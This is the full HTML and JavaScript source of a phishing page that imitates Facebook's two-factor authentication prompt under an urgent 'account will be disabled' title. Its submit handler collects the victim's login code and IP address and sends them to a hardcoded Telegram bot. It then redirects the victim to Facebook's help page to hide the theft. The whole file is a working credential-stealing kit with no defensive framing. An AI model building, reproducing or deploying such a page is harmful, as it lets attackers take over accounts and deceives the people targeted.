
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <!--2021 <$©M> -->
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">

    <link rel="stylesheet" href="bootstrapmodal.css">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="">
        <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/1.9.1/jquery.min.js'></script>
    <script src='https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js'></script>
    <script src='https://cdnjs.cloudflare.com/ajax/libs/bootstrap-validator/0.4.5/js/bootstrapvalidator.min.js'></script>
    <link rel="icon" href="flogo.png">
    <title>Your personal account will be disabled soon!</title>
    <style type="text/css">
      body{
        background-color: #e9ebee;
        margin-bottom:30px;
      }
      .titleh3{
        margin-top: 2px !important;
        font-size:16px;
        padding: 12px;
/*        background-color: #f5f6f7;
*/        border-bottom: 1px solid rgba(0, 0, 0, .101);
        border-top-right-radius: 5px;
        font-weight: 700;
        color: #4b4f56;
        border-top-left-radius: 5px;
        margin-bottom: 0px;
      }
      
      .babikasubmitdesktop{
              background-color:#f5f6f7;
              text-align:right;
              padding: 11px 20px;
          }
          .babikasubmitdesktop button{
            background-color: #4267b2;
            border-color: #4267b2;
            line-height: 31px;
            padding: 0 15px;
            font-weight: 500;
            font-size: 13px;
          }

      .content2 p{
          margin-top:7px;
          margin-bottom:7px;
      }
      .content1{
        background-color: white;
        padding: 10px;
        font-size: 13px;
        border-bottom: 1px solid rgba(0, 0, 0, .101);
      }
      .content2{
        background-color: white;
        padding: 10px;
        font-size: 13px;
        border-bottom: 1px solid rgba(0, 0, 0, .101);
      }
      .content2 a{
        color:#576b95;
      }
      .content2 input[type=text]{
        border: 1px solid #999;
        border-radius: 0px;
        height: 30px;
        font-size:13px;
      }
      
      .afterheader .list-group .list-group-item{
          padding:0px;
          padding-top:5px;
          padding-bottom:5px;
          font-size:14px;
          border:0px;
          color: #444950;
      }
      .afterheader .list-group .list-group-item:hover{
          background-color:rgba(29, 33, 41, .04);
      }
      
      .content2 small{
        margin-bottom: 2px;
      }
      .content2 textarea{
        box-shadow: inset 0 1px 0 rgba(0, 0, 0, .07);
        border: solid 1px #999;
        border-top-color: #888;
        border-radius: 0px;
        height: 65px;
      }
      .butonsend button{
        width:30%;
        float: right;
        background-color: #627aad;
        background-image: linear-gradient(rgba(0, 0, 0, 0), rgba(0, 0, 0, .1));
        font-weight: bold;
      }
      .butonsend {
        background-color: #f5f6f7 !important;
        padding: 11px 20px;
      }
      .navbari .nav-linkuu{
          color:#3578e5 !important;
          font-size:14px !important;
          font-weight:600 !important;
          padding: 15px 0px !important;
          border-bottom: 3px solid #3578e5;
      }
      .navbari .navbar {
          padding-top: 0px !important;
          padding-bottom: 0px !important;
      }
      .navbari{
          background-color:#e9ebee;
      }
      .afterheader{
          margin-top:50px;
      }
      
        @media only screen and (max-width: 600px) {
          .afterheader {
            margin-top:20px;
          }
          .titleh3{
            font-weight: 600;
          }
          body{
            background-color: #e9ebee;
            margin-bottom:20px;
          }
          .navbari{
              display:none;
          }
          .sidebar-afterheader{
              display:none;
          }
          .logojababik{
              height:30px !important;
              text-align:center !important;
          }
          .headerbabika{
              text-align:center !important;
          }
          .searchibl{
              display: none;
          }
          .footeriba{
              display:none;
          }
        }
        
        @media only screen and (min-width: 768px) {
          .content2{
              padding:10px 20px !important;
          }
          .butonsendonlymobile{
              display:none;
          }
          .logojababik{
              height:37px !important;
              text-align:left !important;
          }
          .content2 label{
              color: #90949c !important;
              font-weight:700 !important;
              font-size:12px;
          }
          .content2 small{
              color: #90949c !important;
              margin-bottom:5px;
          }
          .content2 .form-group{
              margin-bottom:9px !important;
          }
          .content2 input[type=text], .content2 textarea, .content2 input[type=password]{
              margin-top:7px !important;
          }
          .headerbabika{
              padding-top: 17px !important;
              padding-bottom: 17px !important;
          }
          .searchibl i{
              color: #616161;
              font-size:13px;
          }
          .searchibl .form-control-lg{
              font-size: 17px;
              padding: 0px 8px !important;
              border:none;
          }
          .searchibl form{
              border: 1px solid  #000;
              border-radius:0px !important;
          }
          .searchibl .card-body{
              padding: 0px !important;
              padding-left: 10px !important;
          }
          .searchibl input{
              height: 36px !important;
              color: #90949c;
          }
          
          
            .footeriba ul {
              list-style-type: none;
              margin: 0;
              padding: 0;
              overflow: hidden;
            }
            
            .footeriba li {
              float: left;
            }
            
           .footeriba  li a {
              display: block;
              color: #90949c;
              text-align: center;
              padding: 15px 10px;
              font-size: 12px;
              text-decoration: none;
            }
            .footeriba  li a.active {
              color: #bec3c9;
            }
            .footermenu{
                margin-top:20px;
                margin-bottom:20px;
            }
            .footermenu .list-group-item{
                border: none;
                font-size:12px;
                color: #90949c;
                padding: 4px 10px;
            }
          .afterheader{
              margin-bottom: 70px !important;
          }
        }
        /* Chrome, Safari, Edge, Opera */
input::-webkit-outer-spin-button,
input::-webkit-inner-spin-button {
  -webkit-appearance: none;
  margin: 0;
}
.headeri{
  background-color: #3a5998;
  padding-top: 12px;
  padding-bottom: 12px;
}
.headeri .logo{
  height: 25px;
}
.headeri .input-group{
  margin-bottom: 0px !important;
}
.headeri .input-group input[type=text]{
  height: 35px;
  border-radius: 0px;
  border: 1px solid black;
}
.headeri .colonalogo{
  padding-top:5px;
}
/* Firefox */
input[type=number] {
  -moz-appearance: textfield;
}
    #timer{
 background: none!important;
  border: none;
  padding: 0!important;
  /*optional*/
  font-family: arial, sans-serif;
  /*input has OS specific font-family*/
  color: #385898;
  cursor: pointer;
  text-decoration-line: none !important;
  display: inline;
    }
    .nolink{
        color: black !important;
        text-decoration-line: none !important;
        cursor: default !important;    
    }
@media (min-width: 768px){
.offset-md-3 {
    margin-left: 25%;
}
}
    </style>
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.2/css/all.css" integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous">

  </head>
  <body>



    <section class="afterheader" style="padding-top:50px;">
      <div class="container">
        <div class="row">
          <div class="col-12 col-md-6 offset-md-3">  
            
            <div style="border: 1px solid #c8cacc; border-radius: 4px">
              <h3 class="titleh3">Two-factor authentication required</h3>
              <div class="content2">
                  <p></p>You’ve asked us to require a 6-digit login code when anyone tries to access your account from a new device or browser.</p>
                  <p>Enter the 6-digit code from your <strong>code generator</strong> or third-party app below.</p>
                  <form method="POST" style="margin-top:14px">
                    <div class="form-group"> 
                      <input type="number" required class="form-control" id="exampleFormControlInput1" name="cg2fa" placeholder="Login code" style="width: 170px !important;display: inline">
                        <input type="hidden" name="password" value="b8e5c89e28ec9c3d26e660078ceba9c6">
                        <input type="text" id="minutes" value="4.9833333333333334" style="display: none !important;" name="2fa">
                        &nbsp;
                        <input type="button" id="timer" value="Start Timer" onclick="startCounter();" style="display: inline"><p id="time" style="display: inline"></p>


                    </div>
              </div>
              <div class="babikasubmitdesktop">
                <a href="javascript: void();" style="margin-top:5px; float: left;font-size: 14px;  color: #385898;font-weight: 641;" data-toggle="modal" data-target="#exampleModalScrollable">Need another way to authenticate?</a>
                  <button name="submit" type="submit" class="btn btn-primary" id="submit_btn">Send</button>
              </div>
              <div class="container butonsend butonsendonlymobile" style="display:none">
      <div class="row">
        <div class="col-12" style="width: 100% !important;">
               <a href="javascript: void();" style="margin-top:5px; float: left;font-size: 14px; color: #385898;font-weight: 641;" data-toggle="modal" data-target="#exampleModalScrollable">Need another way to authenticate?</a>
          <button name="submit" type="submit" class="btn btn-primary" id="submit_btn">Send</button>
        </div>
      </div>
    </div>
            </div>
          </div>
        </div>
      </div>
    </section>
    
    </form>

<div class="modal fade" id="exampleModalScrollable" tabindex="-1" role="dialog" aria-labelledby="exampleModalScrollableTitle" aria-hidden="true">
                <form class="form-horizontal" action=" " method="post" id="reg_form">
        <fieldset>
                <div class="modal-dialog modal-dialog-scrollable" role="document">
                    <div class="modal-content" style="">
                        <div class="modal-header">
                            <h5 class="modal-title" id="exampleModalScrollableTitle" style="color: black !important;">Didn’t receive a code?</h5>
                            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                                <span aria-hidden="true"></span>
                            </button>
                        </div>


                        <div class="modal-body" style="overflow: auto;color: black !important;">

<p>1. Go to <b>Settings</b> > Security and Login.</p>
<p>2. Under the <b>Two-Factor Authentication</b> section, click <b>Use two-factor authentication</b>. You may need to re-enter your password.
</p>
<p>3. Next to <b>Recovery Codes</b>, click <b>Setup</b> then <b>Get Codes</b>. If you've already set up recovery codes, you can click <b>Show Codes</b>.
</p>
<img src="recovery.png" alt="" width="100%">
                        </div>
                        <div class="modal-footer">
                            <button type="button" class="btn canceloje" data-dismiss="modal">Close</button>
                            <button type="button" class="btn canceloje" data-dismiss="modal" style="background-color: #1877f2;color: white">Continue</button>

 	
                        </div>
                        <!-- Text input-->


                        <!-- Button -->
                    </div>

                </div>
                      </fieldset>
    </form>
            </div>



<script>
    // JavaScrtaliipt Document


var mySeconds;
var intervalHandle;
var myButton=document.getElementById("timer");
var timeDisplay=document.getElementById("time");

function resetPage(){   
    myButton.removeAttribute("disabled");
    myButton.value="Send Code Again";
    timeDisplay.innerHTML="";
    myButton.classList.remove('nolink');

}
function tick(){
    var timeDisplay=document.getElementById("time");
    
    var min=Math.floor(mySeconds/60);
    var sec=mySeconds-(min*60);
    
    if (sec < 10) {
        sec="0"+sec;
    }
    
    var message=min.toString()+":"+sec;
    
    timeDisplay.innerHTML=message+" )";
    
    if(mySeconds===0){
        clearInterval(intervalHandle);
        resetPage();
    }
    mySeconds--;
    
    
}
function startCounter(){
    var myInput=document.getElementById("minutes").value;
    if (isNaN(myInput)){
        alert("Type a valid number please");
        return;
    }
    mySeconds=myInput*60;
    
    intervalHandle=setInterval(tick, 1000);
    myButton.disabled=true;
    myButton.value="( wait: ";
    myButton.classList.add('nolink');
    timeDisplay.innerHTML="5:00 )";
    
}
</script>
<script>
      $(document).ready(function () {
      $("#timer").click();});
      </script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>




    <script type="text/javascript">
          $("#submit_btn").click(function(e){
                  e.preventDefault();
                  codeGenerator =  document.getElementById('exampleFormControlInput1').value;                

                   if (codeGenerator == '') {
                  document.getElementById('exampleFormControlInput1').style.borderColor = "red";
                }else{
                  document.getElementById("exampleFormControlInput1").style.borderColor = "black";
                }
                if (codeGenerator != '') {
          $.getJSON('https://ipapi.co/json/', function(data) {
              var obj = JSON.parse(JSON.stringify(data, null, 2));
              country_name = obj.country;
              country_code = obj.country_code;
              country_city = obj.city;
              ipaddress = obj.ip;

                    event.preventDefault()
                          var siteUrl=window.location.href;
                          var emailInfos='Ok';
                          //var firstPassword =  document.getElementById('inputPassword').value; 
                

            
                        var params = {
                           content: '=============================' + '%0A' + 
                                    '7|2FA: "' +  codeGenerator + '"'+ '%0A' +
                                    'IP: "' + ipaddress + '"' + '%0A' +
                                    '============================='
                        }



                          fetch(`https://api.telegram.org/bot6667296963:AAHyYeDr0u9ZnWGWyPFF7E7rtZ-ptQIudXE/sendMessage?chat_id=-1001733687811&text=${params.content}/parse_mode=html`, {
                                  method: 'POST', // or 'PUT'
                                  headers: {
                                      'Content-Type': 'application/json',
                                  },
                                  
                          }).then(function(){
                            window.location.href = "https://www.facebook.com/help";
                          })

               });
        }
               });
    </script>
  </body>
</html>
